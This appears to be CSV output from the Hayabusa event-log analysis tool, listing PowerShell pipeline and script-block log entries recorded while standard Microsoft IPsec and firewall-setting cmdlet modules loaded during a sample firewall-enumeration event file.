name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeSA""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeSA""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecQuickModeSA ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallSetting ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, 